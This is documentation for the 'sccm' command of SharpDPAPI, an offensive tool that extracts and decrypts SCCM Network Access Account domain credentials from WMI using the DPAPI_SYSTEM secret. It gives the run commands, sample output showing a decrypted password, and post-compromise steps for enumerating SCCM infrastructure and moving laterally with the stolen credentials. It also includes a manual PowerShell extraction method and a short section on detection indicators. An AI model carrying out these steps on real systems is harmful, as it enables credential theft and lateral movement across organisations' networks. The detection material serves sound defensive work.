Skip to main content

Overview

The sccm command extracts and decrypts Microsoft SCCM (System Center Configuration Manager) Network Access Account (NAA) credentials from WMI. When elevated on an SCCM client machine, it retrieves the DPAPI_SYSTEM secret and decrypts the stored NAA credentials.
SCCM Network Access Accounts are domain credentials used by clients to access distribution points. These accounts often have elevated privileges in the environment.

Basic Usage

# Extract and decrypt SCCM NAA credentials (requires elevation)
SharpDPAPI.exe sccm
This command requires elevation (Administrator or SYSTEM privileges) to:
  • Access WMI for SCCM policy data
  • Retrieve the DPAPI_SYSTEM LSA secret
  • Decrypt the Network Access Account credentials

Requirements

1

SCCM Client

Target machine must be an SCCM client with the Configuration Manager client installed
2

Network Access Account

SCCM environment must be configured with a Network Access Account
3

Elevation

Must run with Administrator or SYSTEM privileges

How It Works

1

WMI Query

Queries WMI for SCCM policy containing NAA credential blobs:
root\ccm\Policy\Machine\ActualConfig
2

DPAPI_SYSTEM Retrieval

Elevates to SYSTEM and retrieves DPAPI_SYSTEM LSA secret
3

Masterkey Decryption

Uses DPAPI_SYSTEM to decrypt system masterkeys
4

Credential Decryption

Decrypts Network Access Account credentials using masterkeys

What Are SCCM Network Access Accounts?

SCCM Network Access Accounts (NAA) are used by client machines to:
  • Access distribution points for software packages
  • Download OS deployment images
  • Retrieve application content
  • Access task sequences
  • Authenticate to SCCM infrastructure
  • Access management points
  • Communicate with distribution points
  • Download policies and updates
  • OS deployment operations
  • Software distribution
  • Update management
  • Application deployment
NAA credentials are typically domain accounts with access to distribution points and potentially other network resources.

Example Output

[*] Action: SCCM Network Access Account Extraction

[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()

[*] Secret  : DPAPI_SYSTEM
[*]    full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*]    m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3

[*] SYSTEM master key cache:

{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C

[*] Querying WMI for SCCM Network Access Account...

[+] Network Access Account found:

    Username: DOMAIN\sccm_naa
    Password: P@ssw0rd123!
    Domain  : DOMAIN

Why Target SCCM NAA?

Privileged Access

NAA accounts often have elevated privileges for accessing network resources

Lateral Movement

Credentials work across SCCM infrastructure and distribution points

Persistence

Credentials rarely change and work indefinitely

Wide Deployment

Present on all SCCM client machines in the environment

Common Scenarios

After compromising an SCCM client:
# 1. Verify elevation
whoami /groups | findstr "S-1-5-32-544"

# 2. Extract NAA credentials
SharpDPAPI.exe sccm

# 3. Use credentials for lateral movement
# Credentials can access distribution points, management points, etc.
Discover privileged accounts through SCCM:
# Extract NAA credentials
SharpDPAPI.exe sccm

# Test account privileges
# Often has access to:
# - File shares
# - Distribution points
# - Administrative shares
# - Other SCCM infrastructure
Extract credentials from multiple SCCM clients:
# On each SCCM client machine
SharpDPAPI.exe sccm

# Compile unique NAA credentials
# Multiple sites may use different NAAs

Finding SCCM Clients

Identify SCCM client machines: Registry Check: 
# Check if SCCM client is installed
Get-ItemProperty -Path "HKLM:\Software\Microsoft\SMS\Client\Configuration\Client Properties" -ErrorAction SilentlyContinue
Service Check: 
# Check for SCCM client service
Get-Service -Name CcmExec -ErrorAction SilentlyContinue
File System Check: 
# Check for SCCM client directory
Test-Path "C:\Windows\CCM"
Active Directory: 
# Find SCCM clients via AD
Get-ADComputer -Filter * -Properties OperatingSystem |
  Where-Object {$_.OperatingSystem -like "*Windows*"}

SCCM Infrastructure Components

Understanding SCCM infrastructure helps maximize the value of NAA credentials: Distribution Points:
  • Content storage locations
  • Software package repositories
  • NAA credentials provide access
Management Points:
  • Client communication endpoints
  • Policy distribution
  • Status reporting
Site Servers:
  • Central SCCM administration
  • Database servers
  • May be accessible with NAA credentials

Detection Considerations

SCCM credential extraction is a high-value operation that should trigger security alerts.
Host-Based Indicators:
  • Elevation to SYSTEM privileges
  • LSA secret retrieval (DPAPI_SYSTEM)
  • WMI queries to SCCM namespaces
  • Access to CCM policy data
  • SharpDPAPI.exe process execution
WMI Indicators: 
Namespace: root\ccm\Policy\Machine\ActualConfig
Query: SELECT * FROM CCM_NetworkAccessAccount
Event Log Indicators: 
Event ID: 4624 (Logon)
Logon Type: 3 (Network)
Account Name: SYSTEM

Event ID: 4656 (Object Access)
Object: LSA Secrets
Process: SharpDPAPI.exe or suspicious process
Defensive Monitoring:
  • Monitor WMI queries to SCCM namespaces
  • Alert on DPAPI_SYSTEM secret access
  • Track SYSTEM privilege elevation
  • Detect SharpDPAPI or similar tool execution
  • Monitor unusual process accessing WMI SCCM data

machinemasterkeys

Extract machine masterkeys (uses same DPAPI_SYSTEM)

machinetriage

Comprehensive machine DPAPI triage

machinecredentials

Extract machine credential files

backupkey

Retrieve domain backup key

Tips

  • Target workstations and servers with SCCM client
  • NAA credentials often work across entire SCCM infrastructure
  • Test NAA credentials against distribution points
  • Check for multiple NAA accounts (different sites)
  • Correlate with SCCM infrastructure mapping
  • Requires elevation (high visibility)
  • SYSTEM privilege elevation generates events
  • WMI queries may be logged
  • LSA secret access triggers alerts
  • Consider timing and frequency of extraction
No NAA found:
  • SCCM environment may not be configured with NAA
  • Machine may not be SCCM client
  • NAA may not be cached on this client
  • Check WMI namespace manually
Access denied:
  • Need Administrator privileges
  • UAC may block elevation
  • AV/EDR may prevent SYSTEM elevation
  • Security policy may restrict access
SCCM client not found:
  • Verify SCCM client installation
  • Check CcmExec service status
  • Confirm CCM directory exists
  • Machine may not be managed by SCCM

Manual SCCM NAA Extraction

Alternative PowerShell method: 
# Query WMI for NAA policy
$NAA = Get-WmiObject -Namespace "root\ccm\Policy\Machine\ActualConfig" -Class "CCM_NetworkAccessAccount"

# Display encrypted credentials
$NAA.NetworkAccessUsername
$NAA.NetworkAccessPassword

# Note: Password is DPAPI encrypted, requires decryption

SCCM Lateral Movement

After obtaining NAA credentials:
1

Enumerate SCCM Infrastructure

# Find management points
Get-WmiObject -Namespace "root\ccm" -Class "SMS_Authority"

# Find distribution points
Get-WmiObject -Namespace "root\ccm" -Class "SMS_DistributionPoint"
2

Test NAA Access

# Test authentication
net use \\distribution-point\SMS_DP$ /user:DOMAIN\sccm_naa P@ssw0rd123!
3

Access SCCM Shares

# Access distribution points
dir \\distribution-point\SMS_DP$\

# Look for software packages, scripts, sensitive data

Additional Resources

SCCM Security

Learn about SCCM security best practices and hardening Network Access Accounts